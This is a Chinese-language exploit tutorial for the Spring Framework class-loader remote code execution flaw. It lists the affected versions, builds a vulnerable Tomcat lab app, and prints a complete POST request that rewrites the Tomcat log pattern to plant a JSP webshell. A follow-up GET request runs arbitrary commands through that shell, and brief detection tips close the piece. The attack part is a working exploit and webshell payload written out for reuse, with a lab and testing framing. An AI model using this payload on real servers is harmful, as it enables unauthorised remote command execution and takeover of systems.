一、漏洞利用条件
- JDK 9+
- Spring 及其衍生框架
- 使用Tomcat部署spring项目
- 使用了POJO参数绑定
- Spring Framework 5.3.X < 5.3.18 、2.X < 5.2.20 或者其他版本
二、环境搭建
- Java 靶场
- JDK 11(必须9及9以上)
- Tomcat 8
1. 首先需要个实体类
public class HelloWorld {
private String message;
public String getMessage() {
return message;
}
public void setMessage(String message) {
this.message = message;
}
}
3. 再写个controller
传参为这个实体类型
@RestController @RequestMapping("/spring")
public class SpringRce {
@RequestMapping("/rce")
public void vulnerable(HelloWorld model) {
}
}
4. 把项目打成war
包放到Tomcat
中部署运行
FIle — Project Structure
然后Build — Build Artifacts
生成war包,放到Tomcat
的webapps
目录下,启动Tomcat
三、漏洞利用
1. 发送POC
请求包
第一个包是通过Tomcat日志文件在webapps/ROOT
下写一个jsp
的shell
POST /java-sec/xstream HTTP/1.1
Cookie: JSESSIONID=0873A909194640CBAF9EEBC2283C6C97; XSRF- TOKEN=1d91ead1-6fa9-4f1d-b8c9-5cf57dc020b8; remember-me=YWRtaW46MTY1MjUxMTU2MjQ1MTo2M2U2NmNkZjdkOWNhZDAyMzMyMjhhMjAwN2NiZTc4YQ
suffix: %>//
c1: Runtime
c2: <%
DNT: 1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Upgrade-Insecure-Requests: 1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Safari/605.1.15
Accept-Language: zh-CN,zh-Hans;q=0.9
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Length: 757
class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=
2. 命令执行
通过tomcatwar.jsp
执行任意命令
GET /tomcatwar.jsp?pwd=j&cmd=hostname HTTP/1.1
Cookie: JSESSIONID=DF7BCBCC3317CB8B47DFD93C7F8D78FE; XSRF-TOKEN=08a2c187-4ca0-47df-8463-1189a6661f96; remember-me=YWRtaW46MTY1MjUzMjE2MTAxNTozODY1ZTMxOWU1NTg5NTMyYWZlNGQzNzhiN2Q4MGJjYg
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Upgrade-Insecure-Requests: 1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Safari/605.1.15
Accept-Language: zh-CN,zh-Hans;q=0.9
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Length: 0
四、测试中应用
黑盒盲打通过传一个classloader
下的属性:class.module.classLoader.defaultAssertionStatus=123
看服务端是否报异常
白盒的就是要满足上面的利用条件,或者找到POJO传参的controller
再去尝试